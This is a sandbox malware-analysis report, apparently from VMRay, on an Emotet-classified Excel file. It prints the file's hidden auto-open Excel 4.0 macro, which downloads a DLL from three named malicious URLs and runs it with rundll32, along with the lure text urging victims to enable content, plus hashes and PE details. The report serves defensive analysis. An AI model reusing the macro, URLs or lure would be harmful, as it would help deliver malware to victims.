Try VMRay Platform
Malicious
Classifications

Downloader

Threat Names

Emotet Mal/Generic-S Mal/HTMLGen-A

Dynamic Analysis Report

Created on 2022-01-11T12:32:00

bmxixqaylqt.xls

Excel Document
...

Remarks (2/2)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "10 hours, 28 minutes, 39 seconds" to "20 seconds" to reveal dormant functionality.

(0x02000050): This analysis has been updated with the latest reputation and static analysis results from the original analysis with the ID #8537650.

Remarks

(0x0200004A): 28 dumps were skipped because they exceeded the maximum dump size of 7 MB. The largest one was 95 MB.

Filters:
File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\bmxixqaylqt.xls Sample File Excel Document
malicious
...
»
MIME Type application/vnd.ms-excel
File Size 113.00 KB
MD5 20759385064298185538fe8560b6dd18 Copy to Clipboard
SHA1 50ca3dc590956809332b5b878c0ff213d81440a1 Copy to Clipboard
SHA256 7443d5335a207cca176825bd774a412e72882c815206c7f59ace1feb111bb4e9 Copy to Clipboard
SSDeep 3072:yKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgQCyVEdBU6hubsll6UQjvxm:yKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgbr Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
malicious
Names Mal/Generic-S
Office Information
»
Creator Админ
Last Modified By Admin
Create Time 2015-06-05 18:19:34+00:00
Modify Time 2022-01-11 08:18:37+00:00
Codepage ANSI_Cyrillic
Application Microsoft Excel
App Version 16.0
Document Security NONE
Titles Of Parts Sheet, Frb1, Gbi1, GTTTT
scale_crop False
shared_doc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
Excel 4.0 Macros (1)
»
Macro #1: GTTTT
»
Visibility State hidden
Triggers document:AUTO_OPEN
Labels AUTO_OPEN, FAFA, FDFD, FDFD1, FDFD2, FDFD6 
G:14     =FORMULA()=FORMULA(Gbi1!T2,G16)=FORMULA(Frb1!P22&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!H11&Gbi1!U6&Gbi1!C14,G18)=FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!P19&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!M5&Gbi1!U6&Gbi1!C14&Frb1!P13,G20)=FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD1"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!P19&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!P9&Gbi1!U6&Gbi1!C14&Frb1!P13,G22)=FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD2"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!H9&Frb1!B15&Frb1!I17&Frb1!I3&Frb1!H13&Frb1!P11&Frb1!K9&Frb1!P13&Frb1!P7&Frb1!P13,G24)=FORMULA(Frb1!P22&Frb1!H13&Frb1!N4&Frb1!H13&Frb1!H9&Frb1!P11&Frb1!P15&Frb1!H9&Frb1!P20&Gbi1!Q4&Gbi1!S13&Gbi1!M2&Gbi1!R8&Frb1!P15&Frb1!P17&"FDFD6"&Frb1!P13,G26)=FORMULA(Frb1!P22&Frb1!G24&Frb1!H13&Frb1!I26&Frb1!E11&Frb1!G24&Frb1!K23&Frb1!P11&Frb1!P13,G28)
Extracted Image Texts (1)
»
Image 1: 0.png
»
THIS DOCUMENT IS ONLY AVAILABLE FOR DESKTOP OR LAPTOP VERSIONS OF MICROSOFT OFFICE EXCEL. Open the document in Microsoft Office. Previewing online is not available for protected documents. CLICK “ENABLE EDITING” FROM YELLOW BAR ABOVE Once you have enabled editing, please click “Enable Content” button
CFB Streams (3)
»
Name ID Size Actions
Root\Workbook 1 102.54 KB
...
Root\SummaryInformation 2 4.00 KB
...
Root\DocumentSummaryInformation 3 4.00 KB
...
c:\users\keecfmwgj\desktop\15eab100 Dropped File Excel Document
malicious
...
»
Also Known As c:\users\keecfmwgj\desktop\bmxixqaylqt.xls (Dropped File)
MIME Type application/vnd.ms-excel
File Size 113.50 KB
MD5 dbfe6b87a55b8e45be8770781a704711 Copy to Clipboard
SHA1 4dbed3a14da796f0a90b6c20d1fe68f2bd822a9d Copy to Clipboard
SHA256 5968b1706ddb1f6d2fa8120cd03d84f10217c0c1a71b64d3ae9bffbbbb36c4c1 Copy to Clipboard
SSDeep 3072:Ck3hOdsylKlgxopeiBNhZFGzE+cL2kdAJuyVEdBU6hubsll6UQjvxy:Ck3hOdsylKlgxopeiBNhZF+E+W2kdAcR Copy to Clipboard
ImpHash -
Office Information
»
Creator Админ
Last Modified By kEecfMwgj
Create Time 2015-06-05 18:19:34+00:00
Modify Time 2022-01-11 12:42:10+00:00
Codepage ANSI_Latin1
Application Microsoft Excel
App Version 16.0
Document Security NONE
Titles Of Parts Sheet, Frb1, Gbi1, GTTTT
scale_crop False
shared_doc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
Excel 4.0 Macros (1)
»
Macro #1: GTTTT
»
Visibility State hidden
Triggers document:AUTO_OPEN
Labels AUTO_OPEN, FAFA, FDFD, FDFD1, FDFD2, FDFD6 
G:14     =FORMULA()=FORMULA(Gbi1!T2,G16)=FORMULA(Frb1!P22&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!H11&Gbi1!U6&Gbi1!C14,G18)=FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!P19&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!M5&Gbi1!U6&Gbi1!C14&Frb1!P13,G20)=FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD1"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!P19&Frb1!H9&Frb1!L2&Frb1!B15&Frb1!B15&Frb1!P11&Gbi1!C5&Gbi1!E2&Gbi1!G5&Gbi1!P9&Gbi1!U6&Gbi1!C14&Frb1!P13,G22)=FORMULA(Frb1!P22&Frb1!J11&Frb1!B18&Frb1!P11&"FDFD2"&Frb1!P9&Frb1!K9&Frb1!P7&Frb1!H9&Frb1!B15&Frb1!I17&Frb1!I3&Frb1!H13&Frb1!P11&Frb1!K9&Frb1!P13&Frb1!P7&Frb1!P13,G24)=FORMULA(Frb1!P22&Frb1!H13&Frb1!N4&Frb1!H13&Frb1!H9&Frb1!P11&Frb1!P15&Frb1!H9&Frb1!P20&Gbi1!Q4&Gbi1!S13&Gbi1!M2&Gbi1!R8&Frb1!P15&Frb1!P17&"FDFD6"&Frb1!P13,G26)=FORMULA(Frb1!P22&Frb1!G24&Frb1!H13&Frb1!I26&Frb1!E11&Frb1!G24&Frb1!K23&Frb1!P11&Frb1!P13,G28)
G:16     D"&"l"&"lR"&"egister"&"Serve"&"r
G:18     =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gaidov.bg/wp-includes/Ug/","..\sun.ocx",0,0)
G:20     =IF(FDFD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://studiokrishnaproduction.com/wp-includes/3mJ/","..\sun.ocx",0,0))
G:22     =IF(FDFD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://goodmarketinggroup.com/live_site/Y9cEk9QNlDUeg/","..\sun.ocx",0,0))
G:24     =IF(FDFD2<0,CLOSE(0),)
G:26     =EXEC("C:\Windows\SysWow64\rundll32.exe ..\sun.ocx,"&FDFD6)
G:28     =RETURN()
Extracted Image Texts (1)
»
Image 1: 0.png
»
THIS DOCUMENT IS ONLY AVAILABLE FOR DESKTOP OR LAPTOP VERSIONS OF MICROSOFT OFFICE EXCEL. Open the document in Microsoft Office. Previewing online is not available for protected documents. CLICK “ENABLE EDITING” FROM YELLOW BAR ABOVE Once you have enabled editing, please click “Enable Content” button
CFB Streams (3)
»
Name ID Size Actions
Root\Workbook 1 103.14 KB
...
Root\SummaryInformation 2 4.00 KB
...
Root\DocumentSummaryInformation 3 4.00 KB
...
Extracted URLs (3)
»
URL WHOIS Data Reputation Status Recursively Submitted Actions
http://gaidov.bg/wp-includes/Ug/
Show WHOIS
malicious
-
...
http://studiokrishnaproduction.com/wp-includes/3mJ/
Show WHOIS
malicious
-
...
http://goodmarketinggroup.com/live_site/Y9cEk9QNlDUeg/
Show WHOIS
malicious
-
...
QKehbVshDH.dll Downloaded File Binary
malicious
...
»
Also Known As ..\sun.ocx (Downloaded File)
C:\Users\kEecfMwgj\sun.ocx (Downloaded File)
Parent File analysis.pcap
MIME Type application/vnd.microsoft.portable-executable
File Size 413.54 KB
MD5 0c11b35dd313bc03f9a40ef4236bce92 Copy to Clipboard
SHA1 59cd1d20af8bc85c65579f00c40f70aae8aa124c Copy to Clipboard
SHA256 a80843c86ccdbd0e03670ba1205da9a0a0acce34f78b0bf49744edf4364153db Copy to Clipboard
SSDeep 6144:b8OPcQEP/iCaOkKOrjLC43u48PrkFsjhUnyi+u54vIknUGhwG/K6786TEnCAIpiG:b8ScQEPKCr/O2W4Ssjvu54wMbGg Copy to Clipboard
ImpHash b6ba6bb0b5e8761cdb5e532a9adacfc0 Copy to Clipboard
File Reputation Information
»
Verdict
malicious
Names Mal/Generic-S
PE Information
»
Image Base 0x6ab00000
Entry Point 0x6ab01470
Size Of Code 0x17600
Size Of Initialized Data 0x44800
Size Of Uninitialized Data 0x600
File Type FileType.dll
Subsystem Subsystem.windows_cui
Machine Type MachineType.i386
Compile Timestamp 2022-01-10 15:42:05+00:00
Sections (17)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x6ab01000 0x1747c 0x17600 0x600 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.2
.data 0x6ab19000 0x27ce0 0x27e00 0x17c00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 7.55
.rdata 0x6ab41000 0x26dc 0x2800 0x3fa00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ 5.5
.bss 0x6ab44000 0x46c 0x0 0x0 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.edata 0x6ab45000 0x12d 0x200 0x42200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ 3.33
.idata 0x6ab46000 0xb18 0xc00 0x42400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.78
.CRT 0x6ab47000 0x30 0x200 0x43000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.27
.tls 0x6ab48000 0x20 0x200 0x43200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.29
.reloc 0x6ab49000 0x19c4 0x1a00 0x43400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 6.71
/4 0x6ab4b000 0x238 0x400 0x44e00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 1.49
/19 0x6ab4c000 0xa7ba 0xa800 0x45200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 6.16
/31 0x6ab57000 0x197f 0x1a00 0x4fa00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 4.64
/45 0x6ab59000 0x192e 0x1a00 0x51400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 5.87
/57 0x6ab5b000 0xa6c 0xc00 0x52e00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 4.47
/70 0x6ab5c000 0x13a 0x200 0x53a00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 3.5
/81 0x6ab5d000 0x18f4 0x1a00 0x53c00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 3.41
/92 0x6ab5f000 0x5c0 0x600 0x55600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 3.09
Imports (3)
»
KERNEL32.dll (61)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
AddAtomA - 0x6ab461dc 0x46050 0x42450 0x3
CloseHandle - 0x6ab461e0 0x46054 0x42454 0x53
CreateEventA - 0x6ab461e4 0x46058 0x42458 0x84
CreateMutexA - 0x6ab461e8 0x4605c 0x4245c 0x9e
CreateSemaphoreA - 0x6ab461ec 0x46060 0x42460 0xad
DeleteCriticalSection - 0x6ab461f0 0x46064 0x42464 0xd4
DuplicateHandle - 0x6ab461f4 0x46068 0x42468 0xea
EnterCriticalSection - 0x6ab461f8 0x4606c 0x4246c 0xef
FindAtomA - 0x6ab461fc 0x46070 0x42470 0x12e
FreeLibrary - 0x6ab46200 0x46074 0x42474 0x164
GetAtomNameA - 0x6ab46204 0x46078 0x42478 0x170
GetCurrentProcess - 0x6ab46208 0x4607c 0x4247c 0x1c4
GetCurrentProcessId - 0x6ab4620c 0x46080 0x42480 0x1c5
GetCurrentThread - 0x6ab46210 0x46084 0x42484 0x1c8
GetCurrentThreadId - 0x6ab46214 0x46088 0x42488 0x1c9
GetHandleInformation - 0x6ab46218 0x4608c 0x4248c 0x200
GetLastError - 0x6ab4621c 0x46090 0x42490 0x203
GetNativeSystemInfo - 0x6ab46220 0x46094 0x42494 0x225
GetProcAddress - 0x6ab46224 0x46098 0x42498 0x245
GetProcessAffinityMask - 0x6ab46228 0x4609c 0x4249c 0x246
GetProcessHeap - 0x6ab4622c 0x460a0 0x424a0 0x24a
GetSystemTimeAsFileTime - 0x6ab46230 0x460a4 0x424a4 0x27b
GetThreadContext - 0x6ab46234 0x460a8 0x424a8 0x289
GetThreadPriority - 0x6ab46238 0x460ac 0x424ac 0x291
GetTickCount - 0x6ab4623c 0x460b0 0x424b0 0x297
HeapAlloc - 0x6ab46240 0x460b4 0x424b4 0x2d0
HeapFree - 0x6ab46244 0x460b8 0x424b8 0x2d6
InitializeCriticalSection - 0x6ab46248 0x460bc 0x424bc 0x2eb
InterlockedCompareExchange - 0x6ab4624c 0x460c0 0x424c0 0x2f2
InterlockedDecrement - 0x6ab46250 0x460c4 0x424c4 0x2f3
InterlockedExchange - 0x6ab46254 0x460c8 0x424c8 0x2f4
InterlockedExchangeAdd - 0x6ab46258 0x460cc 0x424cc 0x2f5
InterlockedIncrement - 0x6ab4625c 0x460d0 0x424d0 0x2f7
IsBadReadPtr - 0x6ab46260 0x460d4 0x424d4 0x2ff
LeaveCriticalSection - 0x6ab46264 0x460d8 0x424d8 0x326
LoadLibraryA - 0x6ab46268 0x460dc 0x424dc 0x329
QueryPerformanceCounter - 0x6ab4626c 0x460e0 0x424e0 0x393
ReleaseMutex - 0x6ab46270 0x460e4 0x424e4 0x3be
ReleaseSemaphore - 0x6ab46274 0x460e8 0x424e8 0x3c2
ResetEvent - 0x6ab46278 0x460ec 0x424ec 0x3d3
ResumeThread - 0x6ab4627c 0x460f0 0x424f0 0x3d6
SetEvent - 0x6ab46280 0x460f4 0x424f4 0x41d
SetLastError - 0x6ab46284 0x460f8 0x424f8 0x436
SetProcessAffinityMask - 0x6ab46288 0x460fc 0x424fc 0x441
SetThreadContext - 0x6ab4628c 0x46100 0x42500 0x455
SetThreadPriority - 0x6ab46290 0x46104 0x42504 0x45d
SetUnhandledExceptionFilter - 0x6ab46294 0x46108 0x42508 0x467
Sleep - 0x6ab46298 0x4610c 0x4250c 0x474
SuspendThread - 0x6ab4629c 0x46110 0x42510 0x47c
TerminateProcess - 0x6ab462a0 0x46114 0x42514 0x482
TlsAlloc - 0x6ab462a4 0x46118 0x42518 0x487
TlsGetValue - 0x6ab462a8 0x4611c 0x4251c 0x489
TlsSetValue - 0x6ab462ac 0x46120 0x42520 0x48a
TryEnterCriticalSection - 0x6ab462b0 0x46124 0x42524 0x491
UnhandledExceptionFilter - 0x6ab462b4 0x46128 0x42528 0x496
VirtualAlloc - 0x6ab462b8 0x4612c 0x4252c 0x4ad
VirtualFree - 0x6ab462bc 0x46130 0x42530 0x4b2
VirtualProtect - 0x6ab462c0 0x46134 0x42534 0x4b6
VirtualQuery - 0x6ab462c4 0x46138 0x42538 0x4b9
WaitForMultipleObjects - 0x6ab462c8 0x4613c 0x4253c 0x4c0
WaitForSingleObject - 0x6ab462cc 0x46140 0x42540 0x4c2
msvcrt.dll (34)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
__dllonexit - 0x6ab462d4 0x46148 0x42548 0x37
_amsg_exit - 0x6ab462d8 0x4614c 0x4254c 0x90
_beginthreadex - 0x6ab462dc 0x46150 0x42550 0x9d
_endthreadex - 0x6ab462e0 0x46154 0x42554 0xda
_ftime - 0x6ab462e4 0x46158 0x42558 0x124
_initterm - 0x6ab462e8 0x4615c 0x4255c 0x15d
_iob - 0x6ab462ec 0x46160 0x42560 0x161
_lock - 0x6ab462f0 0x46164 0x42564 0x1ca
_onexit - 0x6ab462f4 0x46168 0x42568 0x271
_setjmp3 - 0x6ab462f8 0x4616c 0x4256c 0x2b0
_unlock - 0x6ab462fc 0x46170 0x42570 0x346
_write - 0x6ab46300 0x46174 0x42574 0x3ef
abort - 0x6ab46304 0x46178 0x42578 0x41e
atoi - 0x6ab46308 0x4617c 0x4257c 0x427
calloc - 0x6ab4630c 0x46180 0x42580 0x42b
exit - 0x6ab46310 0x46184 0x42584 0x436
fprintf - 0x6ab46314 0x46188 0x42588 0x446
fputc - 0x6ab46318 0x4618c 0x4258c 0x448
fputs - 0x6ab4631c 0x46190 0x42590 0x449
free - 0x6ab46320 0x46194 0x42594 0x44d
fwrite - 0x6ab46324 0x46198 0x42598 0x458
longjmp - 0x6ab46328 0x4619c 0x4259c 0x486
malloc - 0x6ab4632c 0x461a0 0x425a0 0x487
memcmp - 0x6ab46330 0x461a4 0x425a4 0x48e
memcpy - 0x6ab46334 0x461a8 0x425a8 0x48f
memmove - 0x6ab46338 0x461ac 0x425ac 0x490
memset - 0x6ab4633c 0x461b0 0x425b0 0x492
printf - 0x6ab46340 0x461b4 0x425b4 0x497
realloc - 0x6ab46344 0x461b8 0x425b8 0x4a2
sprintf - 0x6ab46348 0x461bc 0x425bc 0x4ae
strcmp - 0x6ab4634c 0x461c0 0x425c0 0x4b7
strlen - 0x6ab46350 0x461c4 0x425c4 0x4bf
strncmp - 0x6ab46354 0x461c8 0x425c8 0x4c2
vfprintf - 0x6ab46358 0x461cc 0x425cc 0x4e3
USER32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
MessageBoxA - 0x6ab46360 0x461d4 0x425d4 0x1b6
Exports (9)
»
Api name EAT Address Ordinal
DllRegisterServer 0x44a8 0x1
_ZN8DllClass10HelloWorldEv 0x1520 0x2
_ZN8DllClassC1Ev 0x14c4 0x3
_ZN8DllClassC2Ev 0x14c4 0x4
_ZN8DllClassD0Ev 0x1500 0x5
_ZN8DllClassD1Ev 0x14d8 0x6
_ZN8DllClassD2Ev 0x14d8 0x7
_ZTI8DllClass 0x42f9c 0x8
_ZTV8DllClass 0x431b8 0x9
c:\users\keecfmwgj\appdata\roaming\microsoft\excel\dceab100 Dropped File Unknown
clean
...
  • Actions
»
MIME Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
authroot.stl Embedded File Stream
clean
Known to be clean.
...
»
Also Known As c:\users\keecfmwgj\appdata\local\temp\tar374f.tmp (Dropped File)
Parent File -
MIME Type application/octet-stream
File Size 157.81 KB
MD5 d99661d0893a52a0700b8ae68457351a Copy to Clipboard
SHA1 01491fd23c4813a602d48988531ea4abbcdf7ed9 Copy to Clipboard
SHA256 bdd5111162a6fa25682e18fa74e37e676d49cafcb5b7207e98e5256d1ef0d003 Copy to Clipboard
SSDeep 1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\~df0e8bec461e0e10fe.tmp Dropped File Stream
clean
Known to be clean.
...
»
MIME Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b Copy to Clipboard
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 Copy to Clipboard
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
